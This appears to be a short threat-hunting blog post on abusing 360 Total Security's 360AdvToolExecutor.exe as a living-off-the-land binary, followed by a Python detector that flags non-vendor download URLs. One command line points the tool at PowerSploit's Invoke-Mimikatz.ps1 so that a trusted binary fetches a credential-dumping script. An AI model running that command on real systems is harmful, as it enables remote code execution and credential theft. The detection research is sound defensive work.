LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)


Introduction

360AdvToolExecutor

"C:\Program Files (x86)\360\Total Security\Utils\360AdvToolExecutor.exe" /TASKTYPE=InstallBySetup /ADVTOOLIDS=360 Zip "/ADVTOOLURL=http://int.down.360safe.com/360zip/360zip_setup.exe" "/SETUPPARAM=/S /pid=tools" /ADVTOOLNOTIFY=197896
%appdata%\360TotalSecurity\360AdvToolExecutor\Setup
The message shows “Corrupted Installation” and a repair suggestion.
360AdvToolExecutor.exe /TASKTYPE=InstallBySetup "/ADVTOOLURL=https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1"
Exec
ProcessTree

Achieving a full chain would mean that the “360AdvToolExecutor” binary downloads and executes anything from the internet, which could be very interesting :)
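
Added example, not from the original post: a check over process-creation command lines that flags 360AdvToolExecutor.exe runs whose /ADVTOOLURL host is not under the vendor domain. The 360safe.com allow-list is an assumption taken from the one vendor URL shown above, and every sample command line except the first is constructed with placeholder hosts.

```python
import re
from urllib.parse import urlsplit

# Assumption: vendor hosts sit under 360safe.com (from the page's one example).
VENDOR_SUFFIXES = ("360safe.com",)

IMAGE_RE = re.compile(r'(?i)(?:^|[\\/"\s])360AdvToolExecutor\.exe')
URL_RE = re.compile(r'(?i)/ADVTOOLURL=([^"\s]+)')
TASK_RE = re.compile(r'(?i)/TASKTYPE=([^"\s]+)')


def host_is_vendor(host):
    """Exact match or dot-delimited subdomain only (no bare suffix match)."""
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in VENDOR_SUFFIXES)


def classify(cmdline):
    """Return None for unrelated processes, else task, host and verdict."""
    if not IMAGE_RE.search(cmdline):
        return None
    task = TASK_RE.search(cmdline)
    result = {"task": task.group(1) if task else None, "host": None}
    url = URL_RE.search(cmdline)
    if not url:
        result["verdict"] = "no-url"
        return result
    try:
        # .hostname drops any "user@" prefix, so the real target is compared
        result["host"] = urlsplit(url.group(1)).hostname
    except ValueError:
        pass  # unparsable URL: host stays None and is alerted on below
    result["verdict"] = "vendor" if host_is_vendor(result["host"]) else "alert"
    return result


# Constructed command lines; first is the page's vendor example, rest are placeholders.
EXE = r'"C:\Program Files (x86)\360\Total Security\Utils\360AdvToolExecutor.exe"'
SAMPLES = [
    EXE + ' /TASKTYPE=InstallBySetup /ADVTOOLIDS=360 Zip "/ADVTOOLURL=http://int.down.360safe.com/360zip/360zip_setup.exe" "/SETUPPARAM=/S /pid=tools" /ADVTOOLNOTIFY=197896',
    EXE + ' /TASKTYPE=InstallBySetup "/ADVTOOLURL=https://files.example.net/setup.exe"',
    EXE + ' /TASKTYPE=InstallBySetup "/ADVTOOLURL=http://int.down.360safe.com.example.net/setup.exe"',
    EXE + ' /TASKTYPE=InstallBySetup "/ADVTOOLURL=http://int.down.360safe.com@example.net/setup.exe"',
    r'C:\Windows\System32\notepad.exe C:\notes.txt',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line))
```

The image-name match is only a first filter; a copy of the binary under another name would need the /ADVTOOLURL parameter match on its own.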

Conclusion

Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.